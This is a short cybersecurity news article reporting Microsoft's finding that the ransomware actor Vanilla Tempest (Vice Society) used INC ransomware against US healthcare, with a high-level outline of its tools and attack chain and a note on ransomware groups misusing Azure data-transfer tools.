Sep 19, 2024Ravie LakshmananHealthcare / Malware
Microsoft has disclosed that a financially motivated threat actor has resorted to using a ransomware variant known as INC for the first time to target the healthcare industry in the United States.
The company’s threat intelligence team has been monitoring the activity under the moniker Vanilla Tempest (formerly DEV-0832).
“Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494, before utilizing tools like the Supper backdoor, the legitimate AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool,” it stated in a sequence of posts shared on X.
In the subsequent phase, the attackers proceed to move laterally through Remote Desktop Protocol (RDP) and subsequently leverage the Windows Management Instrumentation (WMI) Provider Host to deploy the INC ransomware payload.
According to Microsoft, Vanilla Tempest has been in operation since at least July 2022, with previous attacks targeting various sectors including education, healthcare, IT, and manufacturing, using different ransomware families like BlackCat, Quantum Locker, Zeppelin, and Rhysida.
It’s important to note that the threat actor is also identified as Vice Society, who is known for utilizing existing lockers rather than developing a customized version for their attacks.
This development coincides with ransomware groups like BianLian and Rhysida increasingly using Azure Storage Explorer and AzCopy to move sensitive data from compromised networks to cloud storage in an effort to avoid detection.
“This tool, used for managing Azure storage and objects within it, is being repurposed by threat actors for large-scale data transfers to cloud storage,” modePUSH researcher Britton Manahan explained.